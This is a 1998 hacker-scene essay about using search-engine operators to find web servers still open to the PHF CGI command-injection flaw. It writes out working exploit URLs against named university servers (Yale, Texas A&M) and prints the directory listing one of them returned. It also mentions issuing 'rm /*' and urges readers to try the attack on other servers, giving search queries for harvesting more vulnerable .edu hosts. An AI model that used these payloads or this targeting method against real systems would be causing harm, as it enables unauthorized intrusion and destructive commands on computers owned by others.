~ Essays ~
         to basic    essays
(Courtesy of fravia's advanced searching lores ~ April 1998)

by +Thor

I'm not a native english speaker - like many (most?) other reversers - so please excuse my poor language.

Knowledge is knowledge's reward

So what all this is about? Its about Hacking? Don't know i think its
about searching the Net.

I'll agree at this point (and many others) with Fravia+ who says in one of his pages that you can find everything on a computer near you (or not) on internet.

I have an example of searching effectively the net from my personal experience and it is good to share
it with you fellow +HCUkers. Somebody asked to find some computers with the PHF exploit.
I wanted to test it and see how it works and decide to help him. For you who don't know nothing about it
DON'T LET me explain, just make a search for it through regular search engines (use your favorite which in my
opinion must support boolean searches) or Search in Fravia+ pages to find out about it.
If you don't know how, i must insist: learn how to use the most important search engines first, come to the reversing/hacking/whatever stuff later :-)


I did it once with his site (sorry). Here is the story. I was searching to find something (not remember now)
and i was sure that i had read something about this on Fravia's labyrinth of pages.
I did a search with altavista (my favorite) adding the keyword host:www.fravia.org and i add
next the string i was searching for. What this means is that i asked from a main search Engine
to search only inside a specific host for the string i was looking for.
Unfortunately my search did'nt fish nothing at all. What do you do then in such cases? Quit? NO.
Just go to engine's add URL, and add the pages you are interesting to.
After one or two days max perform once more the same search and you'll have your results.
(You see fravia+'s laziness sometimes is good because you have to find new ways to get your job done :-).

Ok. Ok. For you who are lazy enough try simple nomad's www hack faq. (www.nmrc.org)

OOPS! Back to our subject. The phf exploit. I tried 5 or 6 URL's with no result, because it is a too
old exploit and many servers (by all means not all :-) have fixed it already... then i realized it was boring to do this and i didn't want to get caught, since my IP address will be on numerus log files on target's computer. But wait a minute... aren't machines born to serve us?

So i thought (since i was looking for a file) i could do an ftp search and see what i'll come up with.
Try it go to http://ftpsearch.ntnu.no (serach again! Fravia+ pages to see other URLs of this search engine. many thanxs to Robin Hood+) and make a search in phf. When you study the results you begin thinking.

1. all these servers or some of them maybe have the magical file installed!

2.- most ftp servers are installed in the same machines with http servers and therefore they have the
same name with a little difference we MUST change the ftp portion of the name with www.

EXAMPLE

We can see that one of the engines answers was ftp.cs.yale.edu /usr/local/etc/httpd/cgi-bin/phf. Hmmm maybe we can fish out something if we try it, because of the edu URL. They don't dig it too much. Lets try the www location.

I gave the command to my Netscape browser http://www.cs.yale.edu/ and i came up with a Yale Univercity screen.
Oh! Noo. I read: Yale Univercity Computer science department. They probably have fix it but since we came that far lets give it a try.

I gave the command to my Netscape browser http://www.cs.yale.edu/cgi-bin/phf?Qalias=x%0als
And here is the surprise!!. Their server was very kind and friendly to answer my question. Here is its answer:

Query Results

/usr/local/bin/ph -m alias=x ls

-515:no non-null key field in query.
-515:Initial metas may be used as qualifiers only.
500:Did not understand query.
archie
calendar
cookie
cookie.orig
csdptwww
date
finger
finger-dist
fortune
gmt-saytime.au
gmt-saytime.au.bak
guest-log
homepage
imagemap
info2www
jj
long
lwgate
mail
mail-feedback
nph-test-cgi
phf
post-query
query
saynumber.au
saytime.au
saytime.au.bak
search.pl
slade
src
test-cgi
test-cgi.tcl

test-env
uptime
view-source
wais-ncsa-httpd.pl
wais.pl
xiao
What does it means? Imagine! The current directory listing. Of course we can give many more commands like Fravia's
rm /*
Which I DO NOT recommand! Anyway I told you to check out fravia+'s pages... Try it on stupid servers if you can get them... But please DON'T damage the targets above. It would be very stupid and very easyly fixed by the server's administrators once you do it. So leave the servers above undisturbed, so that other readers, reading this essay can check them out.

3.- Back to our thinking job. Maybe we can do the same think with a web search. My favorite is digital.
Since we want as he (my friend) said edu domain because they have the most possibilities to have it installed,
we give the command domain:edu and the engine will search only that domain

4.- Shoot http://www.altavista.digital.com/cgi-bin/query?
pg=q&what=web&kl=XX&q=domain%3Aedu+%2Bcgi-bin+%2Bphf&search.x=21&search.y=12

5. Begin search and you will find diamonds. I tried one or two . If anybody try this one
This one will work and i'm sure others. http://www.met.tamu.edu/cgi-bin/phf?QAlias=x%0als

6.- Make a search in the domain edu and search only the links that reffered to cgi-bin/phf!!!
Is this kool or what!!! Again i'll use digital http://www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=domain% 3Aedu+link%3Acgi-bin%2Fphf&search.x=55&search.y=5

7.- make a search without the domain to see what you can find. Still the most are
univercities..(Probably the guy was right) http://www.altavista.digital.com/cgi-bin/query?pg=q&what=web&kl=XX&q=l
ink%3A cgi-bin%2Fphf&next.x=43&next.y=9
Allright for those who don't know about domain:, host: link: etc press the next link
http://www.altavista.digital.com/av/content/help_simple.htm
http://www.altavista.digital.com/av/content/help_simple.htm , or read.
What? Offcourse HCU pages. you can find a lot about searching the net. An other good tactic is to
read the help files of search engines. There are all in there. in front of our eyes. All we have to do is
just press the little button named Help.

SEARCH. Search for Simple Nomad's WEB hack FAQ. Many interesting things in there.

SEARCH. Find GTMHH. Very educational, All about email headers, etc.

Hey ! I don't give you these links, because +Orc's tactic is to leave
something for the "student" . Anyway they are the easiest think to find.

I want to send my greetings to Aesculapius (where are you lost?). I love this great +Teacher!

Of Course thanx goes to Fravia+ because he made +Orc's dream true.

 

Thor+
Keep On


to basic
(c) 2000: [fravia+], all rights reserved